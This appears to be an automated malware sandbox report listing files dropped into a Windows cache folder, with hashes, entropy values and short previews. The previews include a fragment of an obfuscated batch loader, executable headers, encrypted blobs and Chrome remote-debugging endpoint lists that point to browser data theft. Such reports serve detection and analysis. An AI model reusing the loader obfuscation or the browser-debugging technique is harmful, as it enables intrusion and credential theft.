                                                                                                                                                                                                                                                                                                  Preview:Set Camp=9..QXipBelle-..AXEGoverning-Tex-Breed-Verification-Ethical-Doctors-..PIInvisible-..ahPMidlands-Brand-Keith-Promotion-Intervals-Orange-Chuck-..cyfJAccident-Creative-Luke-..dwWZRouter-Russell-Jill-Essays-Xhtml-Win-..mPWFoot-Assessments-Grant-..UyNChar-Marcus-Controller-Webcam-Johnson-Madrid-Pix-..Set Counseling=C..AFAutomation-Brighton-Ra-Pins-Illinois-Beside-Sharon-..ItTrouble-Interesting-Chips-Strap-Behaviour-Podcasts-Approx-..TDlChannels-Loose-Young-Lace-Weak-Parameters-..uVHZSmall-Rosa-Inner-..HxeSailing-Deviant-Hood-Conversations-Anytime-Comics-Congo-..YSChains-Subject-Lunch-Mint-Cartoon-Important-Nearest-..BJYQInvesting-Toddler-Allowing-..kCKeywords-..nPUSearches-..Set Focused=E..jOYValue-Easy-Tobacco-Desktop-Burlington-Ja-..TNpFailing-Daughter-..hiTested-Tribe-Females-Quote-Feature-Helpful-Butler-..hFNOperator-Detail-Tunisia-Tapes-Write-Election-Territory-Boob-Cooler-..KQteProbably-Maps-Graphical-Forgotten-..bIStrong-Oxygen-Ul-Novel-..OOSSThreshold-Camp-Tub-Dp-Influence-D

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cohen.cmd (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (944), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25102
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.113247807478338
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:CLr7xw9jD6bo12DAZS4Mt0TuJuZ7kwsFZLfUwfZfLPX2to8rD6r:kXUjDt12s0BiuJuZIw0ZLffhfDK1r8
                                                                                                                                                                                                                                                                                                  MD5:15B3F5F2D363D4D3BC645E1261EE7E5B
                                                                                                                                                                                                                                                                                                  SHA1:AB35B1C8CB947A415C033AC8973137472C21F627
                                                                                                                                                                                                                                                                                                  SHA-256:FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
                                                                                                                                                                                                                                                                                                  SHA-512:5316C823881AD73C85F00A8C78398C485341488B36E4256C7E553AC06EDE4AA682C91AA5607D1AF5B7871C429B5519911C99D3AFE313EE5A93BF1648E814C998
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Set Camp=9..QXipBelle-..AXEGoverning-Tex-Breed-Verification-Ethical-Doctors-..PIInvisible-..ahPMidlands-Brand-Keith-Promotion-Intervals-Orange-Chuck-..cyfJAccident-Creative-Luke-..dwWZRouter-Russell-Jill-Essays-Xhtml-Win-..mPWFoot-Assessments-Grant-..UyNChar-Marcus-Controller-Webcam-Johnson-Madrid-Pix-..Set Counseling=C..AFAutomation-Brighton-Ra-Pins-Illinois-Beside-Sharon-..ItTrouble-Interesting-Chips-Strap-Behaviour-Podcasts-Approx-..TDlChannels-Loose-Young-Lace-Weak-Parameters-..uVHZSmall-Rosa-Inner-..HxeSailing-Deviant-Hood-Conversations-Anytime-Comics-Congo-..YSChains-Subject-Lunch-Mint-Cartoon-Important-Nearest-..BJYQInvesting-Toddler-Allowing-..kCKeywords-..nPUSearches-..Set Focused=E..jOYValue-Easy-Tobacco-Desktop-Burlington-Ja-..TNpFailing-Daughter-..hiTested-Tribe-Females-Quote-Feature-Helpful-Butler-..hFNOperator-Detail-Tunisia-Tapes-Write-Election-Territory-Boob-Cooler-..KQteProbably-Maps-Graphical-Forgotten-..bIStrong-Oxygen-Ul-Novel-..OOSSThreshold-Camp-Tub-Dp-Influence-D

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cultural

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):71680
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.61321542810069
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:9iKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESA:FwS2u5hVOoQ7t8T6pUkBJR8CThpmESA
                                                                                                                                                                                                                                                                                                  MD5:21F9A0D1A89E387CD2274ABC7CE97FE8
                                                                                                                                                                                                                                                                                                  SHA1:0FD8A73629F4EAF6DA323F23F34D9CF3BD365F75
                                                                                                                                                                                                                                                                                                  SHA-256:F494D9FCC5ACD2AAF67C78F50DD42FF180563E7B5D644499C733702577E55331
                                                                                                                                                                                                                                                                                                  SHA-512:DF1162A9F13847AE11FC84D7BFB42914618D24778634E2396D5FE3AC7F26D299D183DF200F7C1594A24106BD1637BEE81F702B8BD590E617CA46A2F7C5E5132D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.......E..P.~...j.......f..u.j.......f..t..~..u.j..M......E..P.G...j.......f..u.j.......f..t..~..u.j..M..^....E..P.....j[......f..u.j[..f..t..~..u.j[.M..,....E..P....._[^....U......$.E.SVW..j.P.F .N...3.~...\$..\$.f.\$.u$Sj.........D$...D$.P.^...P.L$......j@.L$$........M.W.|......f........G..|$.........!......H...t|...tn..3t`...t.j.S...U..D$.P.D$$Pj}Y....YY..u.j.j{......3..F.f.F..|$$.t..D$ ..P.....|$.3..F.f.F..d....F...[....F...R....F...I....F...@....~..u..D$...P......t$...j......j..v ........L$ ...._^[..]...U....VW.}....~[S.M......u..4....]...t..E...P.8....F...P.v....E..P......E..P."......u...[t..F...P.*..._^....U.....E.SVW..j.P.F ....3.~...]..].f.].u!Sj...."....E...E.P....P.M..*......M.W......f..t...G.7...j.S.......3..F.f.F...~..u..E...P.....u...j.....j..v ......._^[....U...hS.M.3.V.M..M....M..M..M.W....3..M.G.}..6....M.......U..E.P.E.Pj X......YY....@....u.j _.M.V.....f98t..M.V....f.8.u.F...U..E.P.E.u.P3..h...h43L..u........j._..u.......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Division

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.101388958324534
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:SyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:SyGS9PvCA433C+sCNC1
                                                                                                                                                                                                                                                                                                  MD5:B7AB55F71BFCD99EE591FC2293C497AA
                                                                                                                                                                                                                                                                                                  SHA1:2EC19D190A7933A11E70F4C14AA5EE11704C2BDB
                                                                                                                                                                                                                                                                                                  SHA-256:FAB67D9952658803C23ED37CB31EF8B70AE9D418641BBD9D6E48DB959D8AE51D
                                                                                                                                                                                                                                                                                                  SHA-512:FDEAEC906C8D6D468B370300BA745283158E70F38874163CB732C88AB972BAA08A9F233E346C701B81C8076E3452F97AA56739616D02313FD10F0C9F9C2BD60C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:aid........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Glad

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.997961977558292
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:GiBm4AFxoREyNUV7afvNWl2CSB4w51YrYILPOZfvIix/NvQLc:GidKgNE7af1kXvoyhLWRNvx
                                                                                                                                                                                                                                                                                                  MD5:B9D283F35F6051D1583EC106DA9F1A14
                                                                                                                                                                                                                                                                                                  SHA1:D3C27BE9B09E9CEFD7AC6AE4E56F1B75B7389D63
                                                                                                                                                                                                                                                                                                  SHA-256:6AC9078BEFA65EB3BF7487C74FE921C5B424EF9E12902B59DCB9D192ED39D342
                                                                                                                                                                                                                                                                                                  SHA-512:0B5B9BBA450A9C9506569E8617964B8AFE14195932F145BB95F2BF2AD24565A18CE3F0C5E40A4D3E05768906CA96B11106AFEB7D43A81DD42FBEC83DA1D9FBAB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:b...W....Vg.....c..@...\B...7....$..Z.=....a5d.;.....`.k..4K...i..............-...A"....vHD....p+.won5c..t.i*W....'X.F..R..s.=........Dv;.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.F.'.F...h..............X..<2...X..<2..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t.P..,P..Myn.2..t.W....$....D...F...X...g...X..<2..m.........8.5...x..2).U.j....r>.v".].w...)...hG..}.k..-...N.2...)<.G..G...c.'.t.&f/]._2..GR.._...?X.1}.O N......`2r...V.3.Y3.mr....3...Ns...?.j...k...]..?..Y.tP#.K..L............s..*l.Qq:.....Z.V.:.4.....Wer=...k.{%..&..#k,F...(.5..h..?7..... ..,H.m. ......4..~r>-..6.O......<cWk.3"....-k.c../.i../s.UYGzs!..Z.Z...........F..Dr.J...=[..0......[...= ...S...&\..o.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3500
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.399260880027048
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:6NnCSHCjNnCwbC8NnC2p9CFNnC+6NdgEC+rNnCV0lCVSNnCgDCaxNnC6PwC62Nn8:6NUNRNANZ6NbrNzNnbNlP42N8
                                                                                                                                                                                                                                                                                                  MD5:5D24CB4D11310DF0CB7F20EB171B93D2
                                                                                                                                                                                                                                                                                                  SHA1:01856AC52AF5977C0D1A05B6493EBD9E4047335A
                                                                                                                                                                                                                                                                                                  SHA-256:A659A3A38F2B81423A6FC4F3FA88AB863AEA46F235924E1E9359F14263A97C81
                                                                                                                                                                                                                                                                                                  SHA-512:1D99ACCE5CEDF290D871B6B74BD80520BA5CBDDA2895C0B77FC7B23BB0096970A7C0F6FA0ACA1EAAA75EB7E1F7FED0302C56E9FE29E4FF436E01F174FB300632
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9419708F87545C64E597CE80A1497BBD",.. "id": "9419708F87545C64E597CE80A1497BBD",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9419708F87545C64E597CE80A1497BBD"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9497CE28D0F1A3AE45F4FB595AE48753",.. "id": "9497CE28D0F1A3AE45F4FB595AE48753",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9497CE28D0F1A3AE45F4FB595AE48753"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.381504749609709
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoC+3OTEC+OfNaoCVfTfyCVfFfNaoCwEVCwLfNaoCYJ0UrU0U8CT:6NnC+3OTEC+2NnCNTyCNxNnCxCgNnC2O
                                                                                                                                                                                                                                                                                                  MD5:8B398FC23197191A31362C6F99EA5FDF
                                                                                                                                                                                                                                                                                                  SHA1:4503A5BCA689E53F633B03D01D289BBB4F47A851
                                                                                                                                                                                                                                                                                                  SHA-256:99C4B7EDE0E02A63B63068CC70CB84981E0DD2873033CECA37FA5EFB42D7ED50
                                                                                                                                                                                                                                                                                                  SHA-512:A3413A2C8CB8C3CA056AC800AB687D3AC9E41471F608E849C483EB936A02078F0C236495E12076108FB1CB55147F50CB5934E7A7C69039777AACC82D19235AFF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/851BBF8E546841171FF04678ED35229A",.. "id": "851BBF8E546841171FF04678ED35229A",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/851BBF8E546841171FF04678ED35229A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5BCFFBE2D7ACBC613B79F1AC198A8CC7",.. "id": "5BCFFBE2D7ACBC613B79F1AC198A8CC7",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5BCFFBE2D7ACBC613B79F1AC198A8CC7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Name

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):122880
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.443588249528694
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:h4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AU:hBNIimuzaAwusPdKaj6iTcPAsAhxY
                                                                                                                                                                                                                                                                                                  MD5:B7A225A35892C158541ED50000DE3CA1
                                                                                                                                                                                                                                                                                                  SHA1:2ED01C2E0C53C3F61F1D8CA3AEA5CFB122F543FD
                                                                                                                                                                                                                                                                                                  SHA-256:5197B20A0EA030CAFD792C75D14663EBC790D55D4CA748ECC5DA58E797BDCB1E
                                                                                                                                                                                                                                                                                                  SHA-512:2731875211B4AE294A95DE3128451B111D801326C8BFD19E64582D25BD39724EBF672BE9A35E2CC52020B145A7964B116ED6445FFA6226C2487C1919560A09FE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...<..a..?_".C...<.lX^...?...@...<..{./.?$.8..^.<.]h.Np.?b..X*..<......?..}._.<...s...?...p.t.<..h.f2.?..$..V.<..4{#s.?U...g..<......?...w...<.J.....?I..Z...<.*.Ow5.?...@..<...FHv.?N.....<..!....?..j....<..v(...?..z..".<.i.6.8.?..?!...<.<...y.?G..o...<.....?.xeF...<.....?.G..T..<...1.<.?V.....<...{.}.?...0...<.......?...a@..<.....?..0....<....@.?....1..<..3...?...a.U.<.!.E...?.I.....<.......?.......<..j.)E.?O......<.I..W..?W.0.e).<...u...?.....T.<......?....?..<..X.J.?!.PO79.<../.Q..?.;..X..<.J]...?V:e:...<..Q....?.Wm..`.<.b;.SO.?4Td.'..<..Xw...?.Y....<...L"..?d...S.<._}?...?.T...x.<..[b.U.?.\.z#..<.^....?1......<..N....?.wa....<.......?....N9.<.a.X;[.?...Y'].<.@...?.....E.<.VOu...?!S..X.<..b.- .?C.:....<...|.a.?B.<..$.<..{...?+X.UG.<.m..e..?>U....<..o]2'.?....I..<....i.?G......<...o..? ...n.<.9.[...?...|.^.<.......?.>o.j..<..._.p.?1S...<..X....?.....l.<..~...?o.x....<.%3.d..?.....{.=.4 ..L.?...V!..=.b..#..?....@g.=....a..?G....z.=..]...?....6..=.o.J

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Norway

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):75776
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.997833338326358
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:bwDHPOTarQNZo49+qq5EkZa2m75a6K2SILq7E2Uyg3a:U7zMX9+75ETXnpSzoyg3a
                                                                                                                                                                                                                                                                                                  MD5:861ABB01893CEF00C917F520F2AC50C9
                                                                                                                                                                                                                                                                                                  SHA1:784492CD688537ECE38D75D5F9345CD75736F13E
                                                                                                                                                                                                                                                                                                  SHA-256:1D40C9FE3FF124342CD6638D8D536267D15DABF9B6816BE3507923912AF8658A
                                                                                                                                                                                                                                                                                                  SHA-512:6B112DF90D22D4C23517F1E7446172025C151F3617F730041EA49C8943572D2D93E7FBA35E4594B5139C73E1321F8B77710888D0001B203502E6CF264877008C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.M(yE.D.#..8....Z(..}<kejc...a.?n|... Q...........0.BR.W...[i....z..m....].B...b..yM.Ik.#@...|i.o.."z(K.O_.8x....%.....Ll..LU.}.}s.wH..+..............Uw.Qm.KPgD^O+c...i.s...M...,z....3 .|+.~[dZ..m..96.:%.%.....O.. h......n.1....F.....s.Gv.*s......c3<...........^.G.1.P...a.^.t.o......&..ZV..".......qq.{......#."&.tu.+0*.....?..k{gO......k...z.......J...$cw..Fl..,x.h.h.N..x..B.........n-\.]?0....U......1.....O.....k..Kl_}...?j-0....DC....H...R8,.oV...x^.?g..}1........._..~.'..6-...)..).Nr...(.#6Q...aA}..C5)..cI..........g:.d..h..YL^.t=B..{..w>I.{.FT.J....$?.Z...5.<...ou2...?..o.[...\A......u9v.LB7;..2.......b.._...(7.R.~.....Yl...|..K...l..E+....7.*.>c...G.|;\.D..V.~.*J..zg..&..h(...*..V(.g.Y{.7.g..2y........K.(.i.mzMNa........-....u..7.'..%.o=+.....yj..\...Q...Fm.d...Tx.z4........?^..*.L...%0.Wq.....p..F.)m...Lw..x.NP...T..=..&bL..8............>.q...^+7(.%...]W...l.C_..J.....UG*..%M.]..K.........9...X.b.si.D.#.}m-.....f_..S"..._.q..A..i....@..".WS

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Proceedings

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):128000
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.342106044541643
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:oZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf9:oK5vPeDkjGgQaE/loUDtf9
                                                                                                                                                                                                                                                                                                  MD5:AE62072FC20EC1B324E6B41DD123A00E
                                                                                                                                                                                                                                                                                                  SHA1:9519EED850217F390C043A7E8505CA88E43DBD8F
                                                                                                                                                                                                                                                                                                  SHA-256:FDA63E313CE6AE96F8A08D803D4822E8757D82DEAE07650303B2D5A54D45CEFE
                                                                                                                                                                                                                                                                                                  SHA-512:E3471F6D3EDDEB13B989EE72EA2A4A8A33D7B0DA1B1F99DEE25C8132B08FD4BE70063A0335E1D300E9FE252C87DA9CE816900C8468C559D0CBF1E1F466D643D7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3..................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Recovery

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):88064
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.671440792234813
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:mGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+6:K5mjccBiqXvpgF4qv+32eOyKODOSpQ6
                                                                                                                                                                                                                                                                                                  MD5:4ED5DCEF027C1FAAD9B155A863F099E7
                                                                                                                                                                                                                                                                                                  SHA1:F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6
                                                                                                                                                                                                                                                                                                  SHA-256:B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
                                                                                                                                                                                                                                                                                                  SHA-512:100BE28B2E696A1BA6543EE005606C782AE2E35BB0E63C56E43CB5FE03B874078A1554C7EBE40121DB5ABFED2FC90E9DDDA3F5B390BF429247268BE902047D2E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.....M..E.E..u.E...._....M....^..j......j.h..L......e...MZ..f9...@.u].<.@.....@.PE..uL.....f9...@.u>.E....@.+.PQ.^...YY..t'.x$.|!.E..........E..3.8..........e..E.....2..M.d......Y_^[..U.........t..}..u.3....M...].U..=..M..t..}..u..u..."...u..[,..YY..].U....L...3...M.....u.....u...!....h..M..l!..Y..Y....#E.].U...u.......Y....H].U...u..Q...Y].."...j......Y..t.hL.B......Y3..j..S....U..j.h3'D.d.....PSVW...L.3.P.E.d.....h....h..M...8.I.h..J.....I.....u.h,.J.....I...........hH.J.V....I.hd.J.V......I.h..J.V......I.....t8..t4..t0.%(.M....h$.M.....I...W....V.,.M..y...YY.0.M...3.PPj.P....I..(.M...t..M.d......Y_^[..j..d....h..M...<.I..(.M...t.P..`.I..U..V...M.V..h.I.....L..E.A....L.V..d.,.....@.M.......L.........\.I.^].R...U..VW...M.W..h.I..u..>.u.....)jd.o...Y..>.t.d.,.....@.M.......L.......W..\.I._^].(.M...u%V.5..L...350.M......h$.M.......I...^.P....I..5(.M...H.I..U..=(.M..Vu,.5..L....u.35,.M....h..M...h$.M.......I....$...M.V..\.I.j..u..5(.M...L.I.V..h.I.^].Vj... .......P......3"

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Silicon

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):53248
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.0293746515034385
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:aMOULtVJBCQs1xaJ3WMygaruSIKlcQljLWWel319stEjFtr+/hdvE6HDyOpbM13i:JLtVSQsbZgar3R/OWel3EYr8qcDP8W1
                                                                                                                                                                                                                                                                                                  MD5:652AB88B812362A12F43E5F561E9ADB4
                                                                                                                                                                                                                                                                                                  SHA1:7C1DD2A4C15F9CC17C4DFFD1BA62D58A58A98FDD
                                                                                                                                                                                                                                                                                                  SHA-256:FF8C2A1CBAA6FDAC41F8D430E5AA9209B7F3514BFEB81F8D612E6AFD7ACD93F5
                                                                                                                                                                                                                                                                                                  SHA-512:DF3B0DFE676802FA9C8DDF5FDBE82B704541554D59F594C6333912CD17C4CE48945F5A07310D30429516CD594E44D7E3E20204E48FCA1D2D6D4B06E434B7814D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:rQueryValueW..VERSION.dll...timeGetTime.2.mciSendStringW....waveOutSetVolume..WINMM.dll.{.InitCommonControlsEx..S.ImageList_Create..o.ImageList_ReplaceIcon.T.ImageList_Destroy.m.ImageList_Remove..r.ImageList_SetDragCursorImage..P.ImageList_BeginDrag.V.ImageList_DragEnter.W.ImageList_DragLeave.^.ImageList_EndDrag.X.ImageList_DragMove..COMCTL32.dll....WNetAddConnection2W.I.WNetUseConnectionW....WNetCancelConnection2W..$.WNetGetConnectionW..MPR.dll.k.InternetCloseHandle...InternetOpenW...InternetSetOptionW..t.InternetCrackUrlW.Z.HttpQueryInfoW....InternetQueryOptionW..r.InternetConnectW..X.HttpOpenRequestW..^.HttpSendRequestW..5.FtpOpenFileW..2.FtpGetFileSize....InternetOpenUrlW....InternetReadFile....InternetQueryDataAvailable..WININET.dll...GetProcessMemoryInfo..PSAPI.DLL...IcmpCreateFile....IcmpSendEcho....IcmpCloseHandle.IPHLPAPI.DLL..!.LoadUserProfileW....CreateEnvironmentBlock..,.UnloadUserProfile...DestroyEnvironmentBlock.USERENV.dll.?.IsThemeActive.UxTheme.dll...InterlockedIncreme

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Subtle

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):70020
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.039348092119214
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:su0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:s4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                                  MD5:4247BC278D872C15C7E77F75E2EC414D
                                                                                                                                                                                                                                                                                                  SHA1:3B3687C0CD3E511C262CB9E85034FE3BBB89E5A2
                                                                                                                                                                                                                                                                                                  SHA-256:973B0AE1E810E5E17A3A96B3B440F6D3CC588E0FB68819D8F249F7C0E81CBCBE
